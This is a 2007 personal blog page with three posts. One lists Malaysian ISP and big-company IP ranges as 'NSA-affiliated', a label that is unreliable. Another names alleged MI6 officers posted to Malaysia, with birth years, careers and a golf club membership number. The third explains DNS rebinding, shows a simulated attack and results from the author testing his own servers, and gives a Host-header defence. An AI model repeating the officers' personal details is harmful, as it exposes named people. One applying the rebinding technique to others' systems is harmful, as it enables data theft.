My Grey Cells Burning

Friday, August 31, 2007
More Interesting Titbits From the Google of Information Security


Source: cryptome; the input data is filtered for entries related to Malaysia & Kuala Lumpur.

This information could be a gift for Malaysia's 50th Golden Anniversary of Independence... which looks bleak with all those superficial lights and sounds.

Happy Merdeka Day!

A sends 30 August 2007:

Please note the following, current as of 2105hrs GMT 30Aug2007:
TIME Telecommunications Sdn Bhd [NSA-affiliated IP range]
Kuala Lumpur MY
211.24.0.0 - 211.25.255.255
ns2.time.net.my [203.121.16.120]
ns1.time.net.my [203.121.16.85]


JARING Communications Sdn Bhd [NSA-affiliated IP range]
Kuala Lumpur MY
202.190.0.0 - 202.190.255.255
ns6.jaring.my [192.228.128.16]
ns5.jaring.my [61.6.38.139]

Looks like Maxis is still clean. And DIGi is not on the list... yet.

Other popular companies on the list:

Google [NSA-affiliated IP ranges]
Mountain View CA US
64.233.160.0 - 64.233.191.255
66.102.0.0 - 66.102.15.255
66.249.64.0 - 66.249.95.255
72.14.192.0 - 72.14.255.255
209.85.128.0 - 209.85.255.255
216.239.32.0 - 216.239.63.255
ns3.google.com [216.239.36.10]
ns4.google.com [216.239.38.10]
ns1.google.com [216.239.32.10]
ns2.google.com [216.239.34.10]

Yahoo [NSA-affiliated IP ranges]
Sunnyvale CA US
69.147.64.0 - 69.147.127.255
216.155.192.0 - 216.155.207.255
ns4.yahoo.com [68.142.196.63]
ns2.yahoo.com [68.142.255.16]
ns5.yahoo.com [216.109.116.17]
ns1.yahoo.com [66.218.71.63]
ns3.yahoo.com [217.12.4.104]

AltaVista Company [NSA-affiliated IP range]
Sunnyvale CA US
216.39.48.0 - 216.39.63.255
ns4.yahoo.com [68.142.196.63]
ns2.yahoo.com [68.142.255.16]
ns5.yahoo.com [216.109.116.17]
ns1.yahoo.com [66.218.71.63]
ns3.yahoo.com [217.12.4.104]

Amazon.com, Inc. [NSA-affiliated IP range]
Seattle WA US
72.44.32.0 - 72.44.63.255
pdns3.ultradns.org [199.7.68.1]
pdns1.ultradns.net [204.74.108.1]
pdns2.ultradns.net [204.74.109.1]

Among many others listed...

Source here.

posted by zarxcky @ 8/31/2007 12:45:00 AM   0 comments
Wednesday, August 15, 2007
Interesting titbits from the Google of Information Security

Source: cryptome, filtered for entries related to Malaysia & K.L.

Update! (17th August 07 12:21 pm)

Latest updated NSA-affiliated resources listed below, as of 16Aug07
at 1600hrs GMT.

Many new NSA-controlled/affiliated IP ranges are listed under
previously disclosed IP block assignees.
TMNET [NSA-affiliated IP ranges]
Kuala Lumpur MY
124.82.0.0 - 124.82.255.255
219.95.128.0 - 219.95.255.255
ns2.tm.net.my [202.188.1.8]
ns3.tm.net.my [202.188.0.184]
ns1.tm.net.my [202.188.0.183]

Source here.


Latest updated NSA-affiliated resources listed below, as of 10Aug07
at 1630hrs GMT.


Many new NSA-controlled/affiliated IP ranges are listed under
previously disclosed IP block assignees.
Telekom Malaysia Berhad [NSA-affiliated IP ranges]
Kuala Lumpur MY
60.48.0.0 - 60.54.255.255
218.111.0.0 - 218.111.255.255
ns2.tm.net.my [202.188.1.8]
ns3.tm.net.my [202.188.0.184]
ns1.tm.net.my [202.188.0.183]


Source here.

311 Names on the Three Lists of MI6 Officers (including 35 duplicates above)
- Filtered to only those who were posted to Malaysia, with the years of service included.


Cortland Lucas Fransella: dob 1948; 73 Hong Kong, 80 Kuala Lumpur, 82 Santiago, 91 Rome, 95 London.*

Nigel Norman Inkster: dob 1952; 76 Kuala Lumpur, 79 Bangkok, 83 Peking, 85 Buenos Aires, 92 Athens, 94 Hong Kong, 98 London.

Anthony John Godwin Insall: dob 1949; 75 Lagos, 82 Hong Kong, 85 Peking, 92 Kuala Lumpur, 99 Oslo, 04 London.

John Jenkins: dob 1955; 83 Abu Dhabi, 89 Kuala Lumpur, 95 Kuwait, 99 Rangoon, 03 Jerusalem (CG).*

Richard Peter Moore: dob 1963; 90 Ankara, 91 Istanbul, 95 Islamabad, 01 Kuala Lumpur (Cllr).*

Note:
Perhaps this is the one and only Richard Peter Moore, playing golf at the Royal Selangor Golf Club, holding membership number #M9021-0. Among those involved with the A/B/C Medal - 7th February 2004 Strokeplay Net is Tunku Naquiyuddin Ibni Tuanku Ja'afar.

Colin Andrew Munro: dob 1946; 71 Bonn, 73 Kuala Lumpur, 81 Bucharest, 87 East Berlin, 90 Frankfurt, 97 Zagreb, 01 Mostar, 03 Vienna (OSCE, Head of UK Delegation).*

Note:
Picture and profiles of Colin Andrew Munro can be seen from Yahoo cache. Somehow the British Embassy located in Vienna has deleted his entry from their website.

Simon Graham Page: dob 1961; 83 Kuala Lumpur, 88 Dublin, 92 New Delhi, 98 Riyadh, 01 London.(* 1 Sec, Bahrain, 05)

Patrick Gilmer Topping: dob 1959; 90 Kuala Lumpur, 94 Washington, 05 Canberra (Cllr).*

Kenneth Mark Williams: 76 Kuala Lumpur, 79 Bridgetown, 88 Harare, 94 Delhi; dob 1944.

Peter Gilruth Wood: dob 1953; 84 Taiwan, 86 Peking, 95 Kuala Lumpur, 02 Peking (Cllr).*

Source here.

posted by zarxcky @ 8/15/2007 03:25:00 PM   0 comments
Tuesday, August 07, 2007
DNS Rebinding Exploit And How I Fix The Javascript Vulnerabilities.



image source: http://www.neatorama.com/2005/10/22/the-cuban-computer/


Reading about DNS rebinding attacks on Slashdot made my curiosity rise, and those grey cells urged me to find out more, since several web and mail servers under my own supervision are working fine now and I of course don't want anything bad to happen to my babies later on.

Query dancing on ChaCha reveals lots of info on DNS rebinding attack how-tos, which can be seen here and here... and here too. People can download the white paper describing the attack in detail. But the easiest explanation can be found at Christian Matthias's blog. Basically, this attack circumvents DNS pinning to steal information: the attacker's page is loaded from a host name the attacker controls, the DNS answer for that name is then switched to the target's address, and the browser's same-origin check (which compares host names, not IP addresses) lets the page read from the new target. In short, "When someone requests a Web site such as www.example.com, the browser needs to perform a DNS lookup on that domain to get the associated numerical address (IP) of the server that hosts the Web site in question. In the next step, the browser sends a query to that IP that moreover contains the domain, a specific Web page and other variables to be able to ultimately retrieve the requested data." More information and examples can be found at Mr Matthias's blog.
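The sequence described above, as an added example that is not code from the original post or from any of the linked sites: a small model of a rebinding resolver, the two servers and a browser, run once with the browser re-resolving the name and once with it pinning the first address. The host name 1186491925437.jumperz.net is the per-visit name from the demo output below; the addresses and page bodies are constructed (RFC 5737 documentation ranges, so nothing touches the network).

```python
# Added example (not code from the original post): a model of the anti-DNS-
# pinning sequence. Names and addresses are constructed; the RFC 5737 ranges
# are documentation addresses that route nowhere, so nothing touches the network.

ATTACK_NAME = "1186491925437.jumperz.net"  # per-visit name, as the demo site uses
ATTACKER_IP = "198.51.100.7"               # serves the attack page
VICTIM_IP = "192.0.2.10"                   # internal server the page must not read
ATTACK_PAGE = "<script>/* waits for TTL, then re-requests its own origin */</script>"
VICTIM_PAGE = "<title>My Client Website</title>"


class RebindingResolver:
    """Authoritative DNS for the attacker's name: the first answer points at the
    attacker (so the page loads), every later answer points at the victim, with
    TTL 0 so a non-pinning browser asks again for the very next request."""

    def __init__(self):
        self.answers = 0

    def resolve(self, name):
        if name != ATTACK_NAME:
            raise LookupError(name)
        self.answers += 1
        ip = ATTACKER_IP if self.answers == 1 else VICTIM_IP
        return ip, 0  # (address, ttl in seconds)


def http_get(ip, host_header):
    """Constructed stand-in for the two servers; returns (Host seen, body)."""
    if ip == ATTACKER_IP:
        return host_header, ATTACK_PAGE
    if ip == VICTIM_IP:
        return host_header, VICTIM_PAGE
    raise ConnectionError(ip)


class Browser:
    """Minimal browser: same-origin policy compares host names, not addresses.
    With pin_dns=True the first address for a name is kept for the session."""

    def __init__(self, resolver, pin_dns):
        self.resolver = resolver
        self.pin_dns = pin_dns
        self.pinned = {}

    def lookup(self, name):
        if self.pin_dns and name in self.pinned:
            return self.pinned[name]
        ip, _ttl = self.resolver.resolve(name)
        if self.pin_dns:
            self.pinned[name] = ip
        return ip

    def load_page(self, name):
        """Navigate to http://name/ and return the page's origin (its host name)."""
        http_get(self.lookup(name), name)
        return name

    def xmlhttprequest(self, origin, name):
        """Script on `origin` fetches http://name/; allowed only for the same host name."""
        if name != origin:
            raise PermissionError("cross-origin XMLHttpRequest blocked")
        return http_get(self.lookup(name), name)


def run_attack(pin_dns):
    """Load the attack page, let the 'Please wait' timer expire, then have the
    page read its own origin again. Returns (Host header the target saw, body)."""
    browser = Browser(RebindingResolver(), pin_dns)
    origin = browser.load_page(ATTACK_NAME)  # first lookup: ATTACKER_IP
    # TTL 0 has expired: a re-resolving browser now gets VICTIM_IP for the same name
    return browser.xmlhttprequest(origin, ATTACK_NAME)


if __name__ == "__main__":
    print("no pinning :", run_attack(pin_dns=False))
    print("pinning    :", run_attack(pin_dns=True))
```

With pinning off the XMLHttpRequest returns the victim's page even though the script never named the victim; with pinning on it only ever reaches the attacker's own server. Note the Host header the victim sees in the first case: it is the attacker's name, which is what a server-side check can key on.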

Although the concept looks simple, the attacker will have a hard time implementing it. As said by Mike Malone, "Though the concept is fairly simple, we agreed that it would be difficult to perform this sort of attack in practice. An attacker would need to have intimate knowledge of the victim's internal network, or rely on Flash or other web technologies to perform a network scan. Moreover, an attack would end as soon as the victim closed their web browser". In short, get secure or your preferred insecure browser will betray you silently.

Enough with devouring explanations; curiosity then moved me on to this site here at jumperz.net, to check whether I can run the exploit against my servers and also this host using the said exploit. This site will send data from your private IP to www.jumperz.net to demonstrate how easy it is to steal information using an anti-DNS-pinning attack. For the moment I only target localhost, a web server and a mail server under my own supervision.

Entering 127.0.0.1 into the box gives a failed attempt, as shown below:

http://1186491925437.jumperz.net/exploits/dnsp3.jsp?address=127.0.0.1

Please wait for 120 seconds.
f1()
ERROR: uncaught exception: [Exception... "Component returned failure code: 0x80004005 (NS_ERROR_FAILURE) [nsIXMLHttpRequest.send]" nsresult: "0x80004005 (NS_ERROR_FAILURE)" location: "JS frame :: http://1186491925437.jumperz.net/exploits/dnsp3.jsp?address=127.0.0.1 :: f2 :: line 50" data: no]
ERROR:
ERROR: 0


(This differs from the result of visiting the DNS rebinding test site, which shows the message "We have detected that your browser is vulnerable to efficient DNS rebinding attacks".)


Exploiting the mail server also shows a failed attempt, because the port is SSL-only and rejects the plain-HTTP request:

http://1286451923437.jumperz.net/exploits/dnsp3.jsp?address=xxx.xxx.24.219


<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Reason: You\'re speaking plain HTTP to an SSL-enabled server port.<br />
Instead use the HTTPS scheme to access this URL, please.<br />
<blockquote>Hint: <a href=\"https://mail.gov.my/\"><b>https://mail.gov.my/</b></a></blockquote></p>
</body></html>


And the most interesting result comes from my web server, with a successful attempt(?); part of the retrieved page is shown below:

http://1184918537.jumperz.net/exploits/dnsp3.jsp?address=xxx.xxx.35.208

<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">
<html xmlns=\"http://www.w3.org/1999/xhtml\">
<head>
<!--[if gte IE 5.5000]>
<script language=\"JavaScript\">
function correctPNG()
{ for(var i=0; i<document.images.length; i++)
{ var img = document.images[i]
var imgName = img.src.toUpperCase()
if (imgName.substring(imgName.length-3, imgName.length) == \"PNG\")
{ var imgID = (img.id) ? \"id=\'\" + img.id + \"\' \" : \"\"
var imgClass = (img.className) ? \"class=\'\" + img.className + \"\' \" : \"\"
var imgTitle = (img.title) ? \"title=\'\" + img.title + \"\' \" : \"title=\'\" + img.alt + \"\' \"
var imgStyle = \"display:inline-block;\" + img.style.cssText
if (img.align == \"left\") imgStyle = \"float:left;\" + imgStyle
if (img.align == \"right\") imgStyle = \"float:right;\" + imgStyle
if (img.parentElement.href) imgStyle = \"cursor:hand;\" + imgStyle
var strNewHTML = \"<span \" + imgID + imgClass + imgTitle
+ \" style=\\\"\" + \"width:\" + img.width + \"px; height:\" + img.height + \"px;\" + imgStyle + \";\"
+ \"filter:progid:DXImageTransform.Microsoft.AlphaImageLoader\"
+ \"(src=\\\'\" + img.src + \"\\\', sizingMethod=\'scale\');\\\"></span>\"
img.outerHTML = strNewHTML
i = i-1
}}}
window.attachEvent(\"onload\", correctPNG);
</script>
<![endif]-->
<title>My Client Website</title>
<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\" />
<link href=\"http://www.gov.my/templates/jo_june/css/template_css.css\" rel=\"stylesheet\" type=\"text/css\" />
<link rel=\"shortcut icon\" href=\"http://www.gov.my/templates/jo_june/images/favicon.ico\" />
<link rel=\"shortcut icon\" href=\"http://www.gov.my/images/icon.gif\" /><script type=\"text/javascript\" language=\"javascript\" src=\"http://www.gov.my/templates/jo_june/javascript.js\"></script>
</head><body><div align=\"center\">
<table width=\"820\" height=\"120\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" >
<tr>
<td height=\"96\" valign=\"top\"><table width=\"856\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">
<tr>
<th width=\"820\" height=\"80\" align=\"left\" valign=\"middle\" scope=\"col\" class=\"header\">
<table width=\"856\" height=\"175\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">
<tr>
<th scope=\"col\"><div align=\"left\"></div></th>
<th scope=\"col\"><div align=\"right\"> </div></th></tr></table>
</th></tr><tr>
<th width=\"820\" height=\"40\" align=\"left\" valign=\"bottom\" scope=\"row\" class=\"path\"><table width=\"856\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">
<tr>
<th width=\"320\" align=\"left\" valign=\"middle\" scope=\"col\"><span class=\"pathway\">Laman Utama </span></th>
<th width=\"500\" align=\"left\" valign=\"bottom\" scope=\"col\">
<script type=\"text/javascript\">

one = function() {
var sfEls = document.getElementById(\"top_menu\").getElementsByTagName(\"li\");
for (var i=0; i<sfEls.length; i++) {
sfEls[i].onmouseover=function() {
this.className+=\"one\" }
sfEls[i].onmouseout=function() {
this.className=this.className.replace(new RegExp(\"one\\\\b\"), \"\"); } } }
if (window.attachEvent) window.attachEvent(\"onload\", one);
</script>
<div id=\"top_menu\"><ul id=\"mainlevel-nav\"><li><a href=\"http://www.gov.my/index.php?option=com_contact&Itemid=3\" class=\"mainlevel-nav\" >Content</a></li><li><a href=\"http://www.gov.my/index.php?option=com_content&task=view&id=20&Itemid=31\" class=\"mainlevel-nav\" >Content</a></li><li><a href=\"http://www.gov.my/index.php?option=com_content&task=section&id=1&Itemid=2\" class=\"mainlevel-nav\" >Content</a></li><li><a href=\"http://www.gov.my/index.php\" class=\"mainlevel-nav\" >Content</a></li></ul></div></th>
</tr></table></th></tr></table></td></tr></table>
<table width=\"856\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" bordercolor=\"#000000\" bgcolor=\"#FFFFFF\">
<tr><td><table width=\"856\" border=\"0\" cellspacing=\"2\" cellpadding=\"0\">
<tr><td width=\"160\" align=\"left\" valign=\"top\"><table cellpadding=\"0\" cellspacing=\"0\" class=\"moduletable\">
<tr><th valign=\"top\">
Content</th></tr><tr><td>
<table width=\"100%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">
<tr align=\"left\"><td><a href=\"http://www.gov.my/index.php?option=com_frontpage&Itemid=1\" class=\"mainlevel\" id=\"active_menu\">Content</a></td></tr>
<tr align=\"left\"><td><a href=\"http://www.gov.my/index.php?option=com_content&task=view&id=20&Itemid=31\" class=\"mainlevel\" >Content</a></td></tr>
<tr align=\"left\"><td><a href=\"http://www.gov.my/index.php?option=com_content&task=view&id=16&Itemid=26\" class=\"mainlevel\" >Content</a></td></tr>
<tr align=\"left\"><td><a href=\"http://www.gov.my/index.php?option=com_content&task=section&id=1&Itemid=2\" class=\"mainlevel\" >Content</a></td></tr>
<tr align=\"left\"><td><a href=\"http://www.gov.my/index.php?option=com_content&task=category&sectionid=3&id=7&Itemid=25\" class=\"mainlevel\" >Content</a></td></tr>
<tr align=\"left\"><td><a href=\"http://www.gov.my/index.php?option=com_search&Itemid=5\" class=\"mainlevel\" >Content</a></td></tr>
<tr align=\"left\"><td><a href=\"http://www.gov.my/index.php?option=com_weblinks&Itemid=23\" class=\"mainlevel\" >Content</a></td></tr>
<tr align=\"left\"><td><a href=\"http://www.gov.my/index.php?option=com_contact&Itemid=3\" class=\"mainlevel\" >Content</a></td></tr>
</table> </td></tr></table>
<table cellpadding=\"0\" cellspacing=\"0\" class=\"moduletable\"><tr><td>
<a href=\"index.php?option=com_content&task=view&id=18&Itemid=29\"><img src=\"images/stories/picture.jpg\" border=\"0\" alt=\"messages\" width=\"150\" height=\"65\" /></a>
</td></tr></table><table cellpadding=\"0\" cellspacing=\"0\" class=\"moduletable\">
<tr><td>
<a href=\"https://mail.gov.my/login.php\"><img src=\"images/stories/mail.jpg\" border=\"0\" alt=\"
" width=\"150\" height=\"80\" /></a> </td></tr></table>
<table cellpadding=\"0\" cellspacing=\"0\" class=\"moduletable\"><tr><th valign=\"top\">
Content</th></tr><tr><td>
<a href=\"http://link.gov.my/default.asp\" target=\"_blank\"><div style=\"text-align: center\"><img src=\"images/images/logo.jpg\" border=\"0\" alt=\"Name\" width=\"96\" height=\"115\" /></div></a>
</td></tr></table>
<table cellpadding=\"0\" cellspacing=\"0\" class=\"moduletable\"><tr>
<th valign=\"top\">Content</th></tr><tr><td>
<div class=\"syndicate\"><div align=\"center\">
<a href=\"http://www.gov.my/index.php?option=com_rss&feed=RSS0.91&no_html=1\">
<img src=\"http://www.gov.my/images/M_images/rss091.gif\" alt=\"RSS 0.91\" name=\"RSS091\" align=\"middle\" border=\"0\" /></a>
</div><div align=\"center\">
<a href=\"http://www.gov.my/index.php?option=com_rss&feed=RSS1.0&no_html=1\">
<img src=\"http://www.gov.my/images/M_images/rss10.gif\" alt=\"RSS 1.0\" name=\"RSS10\" align=\"middle\" border=\"0\" /></a>
</div><div align=\"center\">
<div align=\"center\"><a href=\"http://www.gov.my/index.php?option=com_rss&feed=OPML&no_html=1\">
<img src=\"http://www.gov.my/images/M_images/opml.png\" alt=\"OPML\" name=\"OPML\" align=\"middle\" border=\"0\" /></a>
</div></div> </td></tr></table>



So the question now is, how am I going to fix it?

More from Mike, "Nevertheless, a vulnerability clearly exists, and it could be difficult to resolve. Many web sites rely on round robin DNS configurations for load distribution. Since round robin configurations may legitimately return different IP addresses for the same host name, distinguishing malicious DNS rebinding attacks from round robin configurations will be difficult, if not impossible to do." Does that mean my web server is in deep shit?

Several choices can be found by searching the Vah Vah Vah networks. Disabling JavaScript would be a pain in the ass. The NoScript Firefox extension can help, if not a lot then a little. Another extension that some people recommend is the LocalRodeo extension, which can reduce the chances of some browsers being exploited for the time being, while waiting for another, better finalized solution. Changing the current DNS nameserver to OpenDNS can help too, but obviously not for this kind of problem. Restricting external access to port 80 by means of a firewall is also a good precaution. But then, as far as I know no one ever surfs the Internet using a browser installed on the targeted web server, which makes the exploit much harder to implement. Will that make my web server secure?
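The extensions above protect the client that runs them. For the web server, the check that refuses a rebound request regardless of the visitor's browser is to validate the Host header: the browser sends the attacker's host name (1186491925437.jumperz.net in the run above) because that is the origin it loaded the page from, so a server that only answers for its own names returns an error instead of the page. The following is an added example, not the post's code or jumperz.net's tool: a Host allowlist as WSGI middleware, driven with constructed requests. The allowed names www.gov.my and mail.gov.my are assumed from the output above.

```python
# Added example, not the post's code or jumperz.net's tool: a Host-header
# allowlist as WSGI middleware. A rebound request carries the attacker's
# host name (the origin the browser loaded the page from), so a server that
# only answers for its own names refuses it whatever the visitor's browser does.
import io
import re

# Names this server legitimately answers for (assumed from the output above).
ALLOWED_HOSTS = {"www.gov.my", "mail.gov.my"}

# host[:port] or [v6-literal][:port]; anything else is treated as malformed.
_HOST_RE = re.compile(
    r"^(?:\[(?P<v6>[0-9A-Fa-f:.]+)\]|(?P<name>[^\s:/\[\]]+))(?::(?P<port>\d{1,5}))?$")


def normalise_host(host_header):
    """Lower-cased host name without port or trailing dot, or None if unparsable."""
    if not host_header:
        return None
    m = _HOST_RE.match(host_header.strip())
    if not m:
        return None
    return (m.group("v6") or m.group("name")).lower().rstrip(".")


def host_is_allowed(host_header, allowed=ALLOWED_HOSTS):
    """True only for an exact match against the allowlist: no wildcards, and a
    bare IP literal (what the jumperz demo targets) is never one of our names."""
    host = normalise_host(host_header)
    return host is not None and host in {h.lower() for h in allowed}


class HostCheck:
    """WSGI middleware: refuse any request whose Host is not one of ours."""

    def __init__(self, app, allowed=ALLOWED_HOSTS):
        self.app = app
        self.allowed = allowed

    def __call__(self, environ, start_response):
        if not host_is_allowed(environ.get("HTTP_HOST"), self.allowed):
            body = b"400 Bad Request: unknown Host header\n"
            start_response("400 Bad Request",
                           [("Content-Type", "text/plain"),
                            ("Content-Length", str(len(body)))])
            return [body]
        return self.app(environ, start_response)


def site(environ, start_response):
    """Stand-in for the real site (constructed body)."""
    body = b"<title>My Client Website</title>\n"
    start_response("200 OK", [("Content-Type", "text/html"),
                              ("Content-Length", str(len(body)))])
    return [body]


app = HostCheck(site)


def request(host_header, path="/"):
    """Drive `app` with a constructed GET, no sockets; returns (status, body)."""
    environ = {"REQUEST_METHOD": "GET", "PATH_INFO": path,
               "SERVER_NAME": "localhost", "SERVER_PORT": "80",
               "wsgi.input": io.BytesIO(b"")}
    if host_header is not None:
        environ["HTTP_HOST"] = host_header
    seen = {}

    def start_response(status, headers, exc_info=None):
        seen["status"] = status

    body = b"".join(app(environ, start_response))
    return seen["status"], body


if __name__ == "__main__":
    print(request("www.gov.my"))                 # legitimate visitor: 200
    print(request("1186491925437.jumperz.net"))  # rebound request: 400
    print(request("203.0.113.9"))                # IP literal in Host: 400
```

To serve it for real, wrap `app` with `wsgiref.simple_server.make_server("0.0.0.0", 8080, app).serve_forever()`; the same check is what the `ServerName`/`UseCanonicalName` style of virtual-host configuration, or an explicit default virtual host that only returns an error, gives you in a production web server. The check is exact-match on purpose: a wildcard or suffix match would let the attacker register a matching subdomain.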

Continued in the next part, because it's 04:20 a.m. Time to sleep. Tomorrow I need to build a printer and file server (Samba) plus some print-charging software (GPL, of course!) as part of a charity project for an elementary school that I work on in my free time.

Update! (15th August 15:19 pm):

www.jumperz.net has released an intrusion prevention tool for HTTP/HTTPS.
More information can be found here. You will need JDK 1.4.
I don't have time to test it yet, but soon enough, maybe.

posted by zarxcky @ 8/07/2007 04:15:00 AM   10 comments